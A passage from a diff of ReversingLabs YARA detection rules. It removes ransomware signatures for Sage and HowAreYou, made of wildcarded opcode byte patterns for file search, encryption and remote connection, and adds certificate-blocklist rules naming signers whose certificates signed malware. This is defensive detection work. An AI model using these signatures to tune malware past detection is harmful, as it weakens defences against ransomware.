"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13276-L13292" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d78f709067c83169484d9dd6e1dd8a88852362da028551d4e55e5703a22e04a7" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and (($create_key_file and $create_lst_file and $enumerate_resources and $encrypt_files) or ($create_key and $enumerate_resources and $encrypt_files)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="24:af:70:b5:d1:7a:63:ad:05:3e:58:21" and 1474179615<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Sage : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_402E9Fcba61E5Eaf9C0C7B3Bfd6259D9 : INFO FILE { meta: - description = "Yara rule that detects Sage ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "81f4c666-93f9-51bb-8dda-431ef7a81b74" - date = "2020-07-15" - modified = "2020-07-15" + id = "a24e1201-4a90-5d0f-ac19-4d88a4e4cfe5" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Sage.yara#L1-L77" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "69079b7176050096cdbaaaff30dd0359366b3a6a74e8bc17db348794388f71ba" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13294-L13310" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1bfc2610745a98ebcf0f77504815d9d1c448697fbe407d6c2e075219b401de50" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Sage" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection = { - 83 EC ?? 8B 44 24 ?? 53 55 56 57 8B 7C 24 ?? 8B 77 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? - 8B D8 51 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 89 44 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 89 77 ?? FF 15 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84 - ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 56 53 55 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 85 DB 0F - 84 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 BA ?? ?? ?? ?? 66 3B F2 0F 95 C0 48 25 ?? ?? ?? ?? - 50 6A ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? - ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 8B FF - 8D 54 24 ?? 52 56 FF D3 8D 44 24 ?? 50 8B 44 24 ?? 50 50 57 E8 ?? ?? ?? ?? 83 C4 ?? - 50 56 FF D5 85 C0 0F 84 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 6A ?? 8D 4C 24 ?? 51 8D 54 - 24 ?? 52 6A ?? 68 ?? ?? ?? ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 56 FF 15 ?? ?? ?? ?? - 53 FF 15 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? - 83 C4 ?? 8B 44 24 ?? 5F 5E 5D 5B 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 04 24 83 - C4 ?? C3 57 E8 ?? ?? ?? ?? 83 C4 - } - $encrypt_files = { - 83 EC ?? 53 8B 1D ?? ?? ?? ?? 55 8B 6C 24 ?? 56 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 - ?? ?? ?? ?? 8D 7D ?? 57 FF D3 8B F0 83 FE ?? 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? - ?? 89 44 24 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B - 4C 24 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51 FF D3 8B D8 83 FB ?? 75 ?? - 56 FF 15 ?? ?? ?? ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 54 24 ?? 6A ?? 52 57 - 56 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? 8B E8 FF D6 53 FF D6 85 ED 79 ?? - 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C5 5D 5B 83 C4 ?? C3 57 E8 ?? ?? ?? ?? 8B - F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8B D8 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? - 6A ?? 53 51 EB ?? 8B 4C 24 ?? BA ?? ?? ?? ?? 3B 55 ?? 1B C0 83 C0 ?? 50 51 57 56 56 - E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D8 FF 15 ?? ?? ?? ?? 85 DB 79 ?? 5F 5E 5D 8B C3 5B 83 - C4 ?? C3 57 E8 ?? ?? ?? ?? 8B F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B - D8 53 57 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D 33 - C0 5B 83 C4 ?? C3 - } - $find_files = { - 53 55 8B 2D ?? ?? ?? ?? 56 57 33 FF 57 57 FF D5 8B F0 85 F6 74 ?? 85 FF 74 ?? 57 E8 - ?? ?? ?? ?? 83 C4 ?? 8D 44 36 ?? 50 6A ?? 8B DE E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 57 56 - FF D5 8B F0 3B DE 72 ?? 66 83 3F ?? 8B DF 0F 84 ?? ?? ?? ?? 8B 6C 24 ?? 53 8B FB FF - 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 5C 43 ?? FF D6 85 C0 74 ?? 68 - ?? ?? ?? ?? 57 FF D6 85 C0 74 ?? 57 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 D3 E2 F6 - C2 ?? 74 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? ?? 6A ?? 89 06 8D 46 ?? - 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 51 C7 46 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 8D 56 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 55 89 46 ?? E8 ?? ?? ?? - ?? 83 C4 ?? 66 83 3B ?? 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yongli Li" and pe.signatures[i].serial=="40:2e:9f:cb:a6:1e:5e:af:9c:0c:7b:3b:fd:62:59:d9" and 1477440000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2C84F9136059E96134F8766670Eacd52 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "af7eb5ff-570f-5886-b550-3d327d05fabe" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13312-L13328" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d6778630dcc3e4fe2816e6dee1b823e616f53de8a924057495c7c252948a71b4" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, DIEGO MANUEL RODRIGUEZ" and pe.signatures[i].serial=="2c:84:f9:13:60:59:e9:61:34:f8:76:66:70:ea:cd:52" and 1442215311<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Howareyou : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6716A9C195987D5Cfe53A094779461E7 : INFO FILE { meta: - description = "Yara rule that detects HowAreYou ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "998fbebe-099d-5779-ad4a-91b7b6c8ad6b" - date = "2021-06-14" - modified = "2021-06-14" + id = "fbd05f8b-3289-565c-a5f4-a1514d06ae37" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.HowAreYou.yara#L1-L205" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "90568365aac61d120886f9efa9822ccc23df79a1a55e522c81db6e77477c4f04" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L13330-L13346" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "648fd70432a791b3e589f5eda1b1510045b465623914a9762ff3dfb4a3e022f8" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "HowAreYou" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_p1 = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 05 ?? - ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 0D ?? ?? - ?? ?? 89 08 8B 05 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? - 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 85 C9 74 ?? 74 ?? 8B 49 - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24 - ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ?? - ?? ?? ?? 83 C4 ?? C3 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 - C7 44 24 ?? ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? - E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? 74 ?? 8B - 4A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 05 - ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 D1 - } - $remote_connection_p2 = { - EB ?? 89 4C 24 ?? 89 5C 24 ?? 84 03 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8D 43 ?? 89 44 - 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54 - 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 14 24 FF D1 8B - 44 24 ?? 8B 4C 24 ?? 85 C0 74 ?? 74 ?? 8B 40 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? - ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? - ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C - 24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 44 24 ?? 89 04 24 FF D3 90 E8 - ?? ?? ?? ?? 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8D 05 ?? ?? ?? ?? 89 - 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 - } - $find_files_p1 = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC - ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ?? - ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 54 - 24 ?? 89 9C 24 ?? ?? ?? ?? 31 C0 31 C9 31 ED 31 F6 EB ?? 8B 7C 24 ?? 47 8B 9C 24 ?? - ?? ?? ?? 89 CD 89 C6 89 F8 89 D1 8B 54 24 ?? 39 D0 0F 8D ?? ?? ?? ?? 89 44 24 ?? 89 - 4C 24 ?? 89 AC 24 ?? ?? ?? ?? 89 74 24 ?? 8D 0C C3 8B 11 89 94 24 ?? ?? ?? ?? 8B 49 - ?? 89 8C 24 ?? ?? ?? ?? 8B 6A ?? 89 0C 24 FF D5 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ?? - ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B 8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B - 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 85 C0 0F 86 ?? - ?? ?? ?? 0F B6 11 80 FA ?? 75 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ?? - ?? ?? ?? 80 FA ?? 74 ?? 89 44 24 ?? 89 8C 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 15 - ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ?? - E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 - ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 11 - } - $find_files_p2 = { - 81 FA ?? ?? ?? ?? 75 ?? 0F B7 51 ?? 66 81 FA ?? ?? 75 ?? 0F B6 51 ?? 80 FA ?? 0F 84 - ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? - ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 - 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? - 8B 44 24 ?? 8D 48 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 E9 7F ?? 8B B4 24 ?? ?? - ?? ?? 8D 7C C6 ?? 89 1F 8D 04 C6 8B 1D ?? ?? ?? ?? 85 DB 75 ?? 89 10 89 E8 89 CA 89 - F1 E9 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89 4C 24 ?? 89 6C 24 ?? 89 04 24 89 54 24 ?? - E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 8B B4 24 ?? ?? ?? ?? EB ?? 89 94 24 ?? ?? ?? - ?? 89 5C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24 - ?? 89 6C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 8D 48 - ?? 8B 44 24 ?? 8B 94 24 ?? ?? ?? ?? 8B 5C 24 ?? E9 ?? ?? ?? ?? 8D 54 24 ?? 89 14 24 - 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? - 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 - ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B - } - $find_files_p3 = { - 8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? - ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 89 04 24 89 4C 24 ?? 8B 15 - ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ?? - E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 - ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 - 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ?? - ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? - C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? 89 74 24 ?? 8B 74 24 ?? 89 74 24 ?? E8 ?? ?? ?? - ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 94 24 ?? ?? ?? ?? 89 14 24 8B - 5C 24 ?? 89 5C 24 ?? 8B 2D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 6C 24 - ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B - 84 24 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 83 C1 ?? 88 - 4C 24 ?? 0F B6 08 83 C1 ?? 88 4C 24 ?? 8D 0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ?? - 89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B - 18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D - } - $find_files_p4 = { - 6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ?? ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89 - 29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ?? - E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? - ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08 8B 6C 24 ?? 8B 4C 24 ?? 8B B4 24 ?? ?? ?? - ?? E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 - 0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ?? ?? 89 - 2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8B - 44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? - 89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? - ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B - 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 - 0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 88 4C 24 ?? 0F B6 08 88 4C 24 ?? 8D - } - $find_files_p5 = { - 0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ?? 89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ?? - ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B 18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C - 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ?? - ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89 29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ?? - ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 - 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08 - E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? - ?? 89 0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ?? - ?? 89 2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 - ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 89 AC 24 ?? ?? - ?? ?? 89 8C 24 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? - C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ?? - ?? 89 84 24 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 E8 - } - $encrypt_files_p1 = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC - ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? - ?? ?? ?? ?? 8B 40 ?? 89 04 24 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 84 - 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 15 ?? ?? ?? ?? 39 CA 0F 85 ?? ?? ?? ?? 8B 48 - ?? 89 4C 24 ?? 8B 00 89 84 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 - ?? 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 - 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? - ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8D 54 24 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? - 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8D AC 24 ?? ?? ?? ?? 89 6C 24 ?? 89 4C 24 ?? 89 - 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F - 85 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? - 85 D2 0F 85 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ?? - ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24 - ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 85 D2 0F 85 ?? ?? - ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8 - } - $encrypt_files_p2 = { - 85 C0 0F 85 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 54 - 24 ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C - 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? - 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? - 8B 5C 24 ?? 85 C9 0F 